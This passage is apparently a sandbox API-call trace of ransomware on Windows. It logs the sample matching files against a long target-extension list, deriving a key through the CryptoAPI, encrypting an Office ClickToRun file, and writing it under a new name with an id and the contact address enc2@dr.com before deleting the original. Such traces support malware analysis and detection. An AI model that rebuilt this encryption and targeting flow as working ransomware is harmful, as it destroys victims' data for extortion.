.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0159.628] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0159.628] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0159.628] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\masterdescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\masterdescriptor.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0159.629] ReadFile (in: hFile=0x39c, lpBuffer=0xfdf190, nNumberOfBytesToRead=0x5220, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdf190*, lpNumberOfBytesRead=0x189930*=0x5220, lpOverlapped=0x0) returned 1
	[0159.635] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.636] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcb440) returned 1
	[0159.638] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.638] CryptCreateHash (in: hProv=0xfcb440, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0159.639] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.639] CryptHashData (hHash=0xfb91b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0159.639] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.639] CryptDeriveKey (in: hProv=0xfcb440, Algid=0x6610, hBaseData=0xfb91b0, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb95b0) returned 1
	[0159.639] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.639] CryptEncrypt (in: hKey=0xfb95b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x5220, dwBufLen=0x5220 | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x5230) returned 1
	[0159.640] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0159.640] RtlMoveMemory (in: Destination=0xfe43b8, Source=0xfdf190, Length=0x5220 | out: Destination=0xfe43b8) 
	[0159.640] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.640] CryptEncrypt (in: hKey=0xfb95b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe43b8*, pdwDataLen=0x1894dc*=0x5220, dwBufLen=0x5230 | out: pbData=0xfe43b8*, pdwDataLen=0x1894dc*=0x5230) returned 1
	[0159.641] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.641] CryptDestroyKey (hKey=0xfb95b0) returned 1
	[0159.641] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.642] CryptDestroyHash (hHash=0xfb91b0) returned 1
	[0159.642] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.642] CryptReleaseContext (hProv=0xfcb440, dwFlags=0x0) returned 1
	[0159.642] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0159.642] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0159.643] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.643] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0159.644] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\masterdescriptor.x-none.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 156
	[0159.645] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\masterdescriptor.x-none.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\masterdescriptor.x-none.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0159.645] WriteFile (in: hFile=0x3a0, lpBuffer=0xfe43b8*, nNumberOfBytesToWrite=0x5230, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfe43b8*, lpNumberOfBytesWritten=0x189938*=0x5230, lpOverlapped=0x0) returned 1
	[0159.650] CloseHandle (hObject=0x3a0) returned 1
	[0159.653] CloseHandle (hObject=0x39c) returned 1
	[0159.653] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\masterdescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\masterdescriptor.x-none.xml")) returned 1
	[0159.657] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\masterdescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\masterdescriptor.x-none.xml")) returned 0
	[0159.657] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b61bc49, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b61bc49, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x341a3500, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="s320.hash", cAlternateFileName="S320~1.HAS")) returned 1
	[0159.657] lstrcmpW (lpString1="s320.hash", lpString2="..") returned 1
	[0159.658] lstrcmpW (lpString1="s320.hash", lpString2=".") returned 1
	[0159.658] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\"
	[0159.658] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\", lpString2="s320.hash" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\s320.hash") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\s320.hash"
	[0159.658] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\s320.hash") returned 96
	[0159.658] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0159.658] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\s320.hash", cchLength=0x60 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\s320.hash") returned 0x60
	[0159.658] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.659] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\s320.hash", lpSrch="help_decrypt_your_files") returned 0x0
	[0159.659] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\s320.hash" | out: lpString1="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\s320.hash") returned="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\s320.hash"
	[0159.659] lstrlenW (lpString="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\s320.hash") returned 96
	[0159.659] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0159.659] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.660] StrStrW (lpFirst=".hash", lpSrch=".") returned=".hash"
	[0159.660] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.660] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hash") returned 0x0
	[0159.660] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b61bc49, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b61bc49, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x32e90800, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x38b5ce, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="stream.x86.x-none.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 1
	[0159.660] lstrcmpW (lpString1="stream.x86.x-none.man.dat", lpString2="..") returned 1
	[0159.660] lstrcmpW (lpString1="stream.x86.x-none.man.dat", lpString2=".") returned 1
	[0159.661] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\"
	[0159.661] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\", lpString2="stream.x86.x-none.man.dat" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\stream.x86.x-none.man.dat") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\stream.x86.x-none.man.dat"
	[0159.661] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\stream.x86.x-none.man.dat") returned 112
	[0159.661] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0159.661] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\stream.x86.x-none.man.dat", cchLength=0x70 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\stream.x86.x-none.man.dat") returned 0x70
	[0159.661] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.662] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\stream.x86.x-none.man.dat", lpSrch="help_decrypt_your_files") returned 0x0
	[0159.662] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\stream.x86.x-none.man.dat" | out: lpString1="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\stream.x86.x-none.man.dat") returned="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\stream.x86.x-none.man.dat"
	[0159.662] lstrlenW (lpString="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\stream.x86.x-none.man.dat") returned 112
	[0159.662] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0159.662] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.662] StrStrW (lpFirst=".dat", lpSrch=".") returned=".dat"
	[0159.663] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.663] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bm